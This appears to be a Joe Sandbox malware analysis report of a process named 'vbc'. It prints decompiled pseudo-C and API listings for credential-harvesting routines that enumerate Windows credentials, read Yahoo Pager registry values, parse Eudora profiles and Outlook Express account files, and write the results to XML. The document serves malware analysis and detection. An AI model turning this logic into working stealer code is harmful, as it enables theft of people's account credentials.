  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
• strlen.MSVCRT ref: 0040DD15
• strcpy.MSVCRT(?,?), ref: 0040DD26
• LocalFree.KERNEL32(?), ref: 0040DD33
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 3335197805-3671122194
• Opcode ID: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
• Instruction ID: efac9c12738a0d8289842d1efaad299d98c72222a78c1cf1bd4cf7de0e5ce36b
• Opcode Fuzzy Hash: d42203313a812c175362967ded223f6fc05771b77deb048e9d9358547b9af39c
• Instruction Fuzzy Hash: 47313AB6E00109ABDB10EF96DD45DEE7BB8EF85304F10007AE605F7291D7389A45CB68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403278(void* __fp0, intOrPtr _a4) {
    int _v8;
    char _v12;
    char _v13;
    char _v14;
    char _v15;
    void _v1035;
    char _v1036;
    char _v1968;
    char _v2900;
    void* __esi;
    void* _t23;
    int _t30;
    char* _t31;
    CHAR* _t49;
    void* _t50;
    void* _t55;

    _t62 = __fp0;
    _t49 = _a4 + 0xd2a;
    if( *_t49 != 0) {
        _t52 =  &_v1968;
        E00402197( &_v1968);
        if(E00403127(_t52, _t49, 0) != 0) {
            E004023C6(_t52, __fp0, _a4);
        }
        _v1036 = 0;
        memset( &_v1035, 0, 0x400);
        _t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
        if(_t30 <= 0) {
            L11:
            return _t30;
        } else {
            _v12 = 0;
            _v13 = 0;
            _v14 = 0;
            _v15 = 0;
            _t50 = 0;
            _t31 =  &_v1036;
            while(1) {
                _t30 = strlen(_t31);
                _v8 = _t30;
                if(_t30 <= 0) {
                    goto L11;
                }
                _t54 =  &_v2900;
                E00402197( &_v2900);
                if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E00403127(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
                    E004023C6(_t54, _t62, _a4);
                }
                _t30 = _v8;
                _t50 = _t50 + _t30 + 1;
                if(_t50 >= 0x3ff) {
                    goto L11;
                } else {
                    _t31 = _t55 + _t50 - 0x408;
                    continue;
                }
            }
            goto L11;
        }
    }
    return _t23;
}
APIs
  • Part of subcall function 00403127: strchr.MSVCRT ref: 0040323C
• memset.MSVCRT ref: 004032CC
• GetPrivateProfileSectionA.KERNEL32 ref: 004032E6
• strchr.MSVCRT ref: 0040331B
  • Part of subcall function 004023C6: _mbsicmp.MSVCRT ref: 004023FE
• strlen.MSVCRT ref: 0040335D
  • Part of subcall function 004023C6: _mbscmp.MSVCRT ref: 004023DA
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
• Instruction ID: a1e53a31d12307489e3dcdfde72dead8da93f466afb76ebe56892d48a8bd1a3f
• Opcode Fuzzy Hash: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
• Instruction Fuzzy Hash: 2A21D676A041096EDB10AF699D81ADE7F6C9F00309F1440BBEA04F3181DB789B86866D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00411622(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
    void* _v8;
    void _v1031;
    char _v1032;
    void* __esi;
    void* _t25;
    int _t26;

    _t25 = __ecx;
    _t26 = 0;
    _v1032 = 0;
    memset( &_v1031, 0, 0x3ff);
    if(E0040F1B0(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
        if(E0040F1F1(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040F1F1(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
            _t26 = E0041194A(_t25, _a8, _a4,  &_v1032);
        }
        RegCloseKey(_v8);
    }
    return _t26;
}
APIs
• memset.MSVCRT ref: 00411644
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
  • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Opcode ID: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
• Instruction ID: 516cda371f3396bdfc4173c93ac40c9cbeab8f1746814b3412c432ea0c8be721
• Opcode Fuzzy Hash: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
• Instruction Fuzzy Hash: 8401C4B5A00018FBDB109A15CD01FDE7A6D9B90354F040072FF08F2221F2358F599A98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
		E00405F4B(long __eax, struct HWND__* _a4) {
			char _v1028;
			char _v2052;
			void* __edi;
			long _t15;

			_t15 = __eax;
			if(__eax == 0) {
				_t15 = GetLastError();
			}
			E00405E50(_t15,  &_v1028);
			sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
			return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
		}

0x00405f55
0x00405f59
0x00405f61
0x00405f61
0x00405f6a
0x00405f83
0x00405fa4

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
• Opcode ID: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
• Instruction ID: f1cbc3d381c34e383a1f44b31e9a73e3da945176662b790f0432ac9700464d50
• Opcode Fuzzy Hash: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
• Instruction Fuzzy Hash: 90F0A77680010977CB10AB64CC06FDB77BCAB44704F140076BB45E2140EA74DB458EA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
		E0040F6A8(intOrPtr _a4) {
			_Unknown_base(*)()* _t3;
			void* _t7;
			struct HINSTANCE__* _t8;

			_t7 = 0;
			_t8 = LoadLibraryA("shlwapi.dll");
			_t3 = GetProcAddress(_t8, "SHAutoComplete");
			if(_t3 != 0) {
				_t7 =  *_t3(_a4, 0x10000001);
			}
			FreeLibrary(_t8);
			return _t7;
		}

0x0040f6af
0x0040f6b7
0x0040f6bf
0x0040f6c7
0x0040f6d4
0x0040f6d4
0x0040f6d7
0x0040f6e1

APIs
• LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405C4B,00000000), ref: 0040F6B1
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F6BF
• FreeLibrary.KERNEL32(00000000), ref: 0040F6D7
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
• Opcode ID: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
• Instruction ID: ed3b1cda8c3177e5f4c950405da88c53b72577223da9c459121c2a3053d1176f
• Opcode Fuzzy Hash: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
• Instruction Fuzzy Hash: 5AD02B313002106BDA305F21BC09EEF3DEDEFC47937018032F800D2164DB258D0281AC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
		E00409808(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
			void _v259;
			char _v260;
			signed int _t34;
			char* _t45;
			void* _t47;

			E00405F07(_a4, "<item>\r\n");
			_t34 = 0;
			if( *((intOrPtr*)(__edi + 0x20)) > 0) {
				do {
					_v260 = 0;
					memset( &_v259, 0, 0xfe);
					E0040F70E( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
					_t45 =  &_v260;
					E0040918B(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
					sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
					E00405F07(_a4,  *(__edi + 0x54));
					_t47 = _t47 + 0x28;
					_t34 = _t34 + 1;
				} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
			}
			return E00405F07(_a4, "</item>\r\n");
		}

0x0040981a
0x0040981f
0x00409826
0x00409829
0x00409837
0x0040983e
0x0040985a
0x00409869
0x0040986f
0x00409883
0x0040988e
0x00409893
0x00409896
0x00409897
0x0040989c
0x004098ae

APIs
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
• memset.MSVCRT ref: 0040983E
  • Part of subcall function 0040F70E: memcpy.MSVCRT ref: 0040F77C
  • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
  • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
• sprintf.MSVCRT ref: 00409883
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
• String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                        • API String ID: 3200591283-2769808009
                                                                                                                                                                        • Opcode ID: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                                                                                                                                                                        • Instruction ID: 22b2cf82475c3b06c8668363684e5b6771b4bc8edfe41877af386eb7fddec59d
                                                                                                                                                                        • Opcode Fuzzy Hash: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B11A331600616BFDB11AF15CC42E967B64FF0831CF10017AF909666A2D77ABDA4DF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 94%
E00411270(void* __eflags, intOrPtr _a4, void* _a8) {
	void* _t12;
	void* _t15;
	char* _t19;
	void* _t25;
	void* _t28;
	long _t31;

	_t12 = E00405ED5(_a8);
	_a8 = _t12;
	if(_t12 != 0xffffffff) {
		_t31 = GetFileSize(_t12, 0);
		_t37 = _t31 - 2;
		if(_t31 > 2) {
			_t3 = _t31 + 2; // 0x2
			_t15 = _t3;
			L00412090();
			_t25 = _t15;
			_t28 = _t15;
			SetFilePointer(_a8, 2, 0, 0);
			_t5 = _t31 - 2; // -2
			E00406725(_t25, _a8, _t28, _t5);
			_t19 = _t28 + _t31;
			 *((char*)(_t19 - 2)) = 0;
			 *((char*)(_t19 - 1)) = 0;
			 *_t19 = 0;
			E00411133(_t25, _t37, _a4, _t28);
			_push(_t28);
			L00412096();
		}
		return CloseHandle(_a8);
	}
	return _t12;
}

0x00411276
0x0041127f
0x00411282
0x00411290
0x00411292
0x00411295
0x00411297
0x00411297
0x0041129c
0x004112a1
0x004112a9
0x004112ab
0x004112b1
0x004112b9
0x004112c1
0x004112c8
0x004112cb
0x004112ce
0x004112d0
0x004112d5
0x004112d6
0x004112dc
0x00000000
0x004112e7
0x004112e9

APIs
  • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 0041128A
• ??2@YAPAXI@Z.MSVCRT ref: 0041129C
• SetFilePointer.KERNEL32(0041141B,00000002,00000000,00000000,?,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112AB
  • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
  • Part of subcall function 00411133: wcslen.MSVCRT ref: 00411146
  • Part of subcall function 00411133: ??2@YAPAXI@Z.MSVCRT ref: 0041114F
  • Part of subcall function 00411133: WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
  • Part of subcall function 00411133: strlen.MSVCRT ref: 004111AB
  • Part of subcall function 00411133: memcpy.MSVCRT ref: 004111C5
  • Part of subcall function 00411133: ??3@YAXPAX@Z.MSVCRT ref: 00411258
• ??3@YAXPAX@Z.MSVCRT ref: 004112D6
• CloseHandle.KERNEL32(0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112E0
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID:
• API String ID: 1886237854-0
• Opcode ID: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
• Instruction ID: e21230228d1277bb6eddc604f6d9b170c83676d8100b74bfcef0317b0316c018
• Opcode Fuzzy Hash: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
• Instruction Fuzzy Hash: BA01B532404248BEDB106F75EC4DDDBBFACEF59368710816BF958C62A0DA358D54CB68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00407D63(void* __esi, struct HWND__* _a4, signed int _a8) {
	intOrPtr _v12;
	struct tagPOINT _v20;
	struct tagRECT _v36;
	int _t27;
	struct HWND__* _t30;
	struct HWND__* _t32;

	_t30 = _a4;
	if((_a8 & 0x00000001) != 0) {
		_t32 = GetParent(_t30);
		GetWindowRect(_t30,  &_v20);
		GetClientRect(_t32,  &_v36);
		MapWindowPoints(0, _t32,  &_v20, 2);
		_t27 = _v36.right - _v12 - _v36.left;
		_v20.x = _t27;
		SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
	}
	if((_a8 & 0x00000002) != 0) {
		E0040658F(_t30);
	}
	return 1;
}

0x00407d6e
0x00407d71
0x00407d7b
0x00407d82
0x00407d8d
0x00407d9d
0x00407dab
0x00407db3
0x00407db9
0x00407dbf
0x00407dc4
0x00407dc7
0x00407dcc
0x00407dd2

APIs
• GetParent.USER32(?), ref: 00407D75
• GetWindowRect.USER32 ref: 00407D82
• GetClientRect.USER32 ref: 00407D8D
• MapWindowPoints.USER32 ref: 00407D9D
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407DB9
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
• Instruction ID: 038819a919944698b8d7aadaf115a7119d50e81e4b6eee93b7f6b8021a4f8f43
• Opcode Fuzzy Hash: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
• Instruction Fuzzy Hash: F7015A32801129BBDB11AFA59C49EFFBFBCEF46751F04812AFD05A2140D738A605CBA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                                        			E004099DA(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				void _v259;
                                                                                                                                                                        				char _v260;
                                                                                                                                                                        				void _v515;
                                                                                                                                                                        				char _v516;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                        				char* _t28;
                                                                                                                                                                        
                                                                                                                                                                        				_t26 = __ecx;
                                                                                                                                                                        				_v260 = 0;
                                                                                                                                                                        				memset( &_v259, 0, 0xfe);
                                                                                                                                                                        				_v516 = 0;
                                                                                                                                                                        				memset( &_v515, 0, 0xfe);
                                                                                                                                                                        				E00405F07(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                                                                        				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
                                                                                                                                                                        				_t28 =  &_v260;
                                                                                                                                                                        				E0040918B(_t28, _t17);
                                                                                                                                                                        				sprintf( &_v516, "<%s>\r\n", _t28);
                                                                                                                                                                        				return E00405F07(_a4,  &_v516);
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004099FD
                                                                                                                                                                        • memset.MSVCRT ref: 00409A13
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                          • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                          • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409A4A
                                                                                                                                                                        Strings
                                                                                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409A18
                                                                                                                                                                        • <%s>, xrefs: 00409A44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                        • API String ID: 3202206310-1998499579
                                                                                                                                                                        • Opcode ID: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                                                                                                                                                                        • Instruction ID: e71924cd66665c82b0e0cf5586ba0e292e849e53f6e9b6834f4978a1b65f22f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                                                                                                                                                                        • Instruction Fuzzy Hash: B601A7B2A001296AD720A655DC45FDB7A6C9F54704F0400FAB609F7182D7B8AA94CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040A632(void* __eax) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t36;
                                                                                                                                                                        
                                                                                                                                                                        				_t36 = __eax;
                                                                                                                                                                        				SendMessageA( *( *((intOrPtr*)(__eax + 0x370)) + 0x184), 0xb, 0, 0);
                                                                                                                                                                        				E00405E36();
                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)) + 0x28)) = 0;
                                                                                                                                                                        				SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x5c))();
                                                                                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x74))(1);
                                                                                                                                                                        				E0040A5A1(_t36);
                                                                                                                                                                        				SetCursor( *0x417b98);
                                                                                                                                                                        				SetFocus( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184));
                                                                                                                                                                        				return SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0xb, 1, 0);
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A64F
                                                                                                                                                                          • Part of subcall function 00405E36: LoadCursorA.USER32 ref: 00405E3D
                                                                                                                                                                          • Part of subcall function 00405E36: SetCursor.USER32(00000000,?,0040BCA6), ref: 00405E44
                                                                                                                                                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A672
                                                                                                                                                                          • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5C7
                                                                                                                                                                          • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5F1
                                                                                                                                                                          • Part of subcall function 0040A5A1: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                                                                                                                                                                          • Part of subcall function 0040A5A1: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                                                                                                                                                                        • SetCursor.USER32(?,?,0040B7F8), ref: 0040A697
                                                                                                                                                                        • SetFocus.USER32(?,?,?,0040B7F8), ref: 0040A6A9
                                                                                                                                                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A6C0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2210206837-0
                                                                                                                                                                        • Opcode ID: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                                                                                                                                                                        • Instruction ID: 509cc9229267159212bead5259dcc336d8983f4e7fdf05ffa4c6fe4d4677fdd3
                                                                                                                                                                        • Opcode Fuzzy Hash: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                                                                                                                                                                        • Instruction Fuzzy Hash: C601E9B1244604EFD326AB75CD89FA6B7E9FF48305F0544B9F15D9B271CA716E018B10
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                        			E004086DC(void* __esi) {
                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                        				intOrPtr _t10;
                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                        				intOrPtr* _t18;
                                                                                                                                                                        				void* _t19;
                                                                                                                                                                        
                                                                                                                                                                        				_t19 = __esi;
                                                                                                                                                                        				_t9 =  *((intOrPtr*)(__esi + 0x24));
                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                        					_push(_t9);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t10 =  *((intOrPtr*)(_t19 + 0x34));
                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                        					_push(_t10);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
                                                                                                                                                                        				if(_t11 != 0) {
                                                                                                                                                                        					_push(_t11);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
                                                                                                                                                                        				if(_t18 != 0) {
                                                                                                                                                                        					_t11 =  *_t18;
                                                                                                                                                                        					if(_t11 != 0) {
                                                                                                                                                                        						_push(_t11);
                                                                                                                                                                        						L00412096();
                                                                                                                                                                        						 *_t18 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(_t18);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
                                                                                                                                                                        				 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                                                                                                                                        				 *((intOrPtr*)(_t19 + 0x34)) = 0;
                                                                                                                                                                        				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
                                                                                                                                                                        				return _t11;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                        • Instruction ID: 072aa514f388f074079b8f328b082be18a1f899df3a3abdece790e68ac814aea
                                                                                                                                                                        • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                        • Instruction Fuzzy Hash: 97F0F4725057115FDB309FB99EC055BBBD5BB08714760093FF28AD3641CB79A890C618
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                        			E00408742(intOrPtr* __edi) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void** _t7;
                                                                                                                                                                        				intOrPtr* _t12;
                                                                                                                                                                        				intOrPtr* _t18;
                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                        
                                                                                                                                                                        				_t18 = __edi;
                                                                                                                                                                        				 *__edi = 0x414350;
                                                                                                                                                                        				E004086DC(__edi);
                                                                                                                                                                        				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                        					E00406B8A(_t21);
                                                                                                                                                                        					_push(_t21);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                                                                                                                                                        				if(_t22 != 0) {
                                                                                                                                                                        					E00406B8A(_t22);
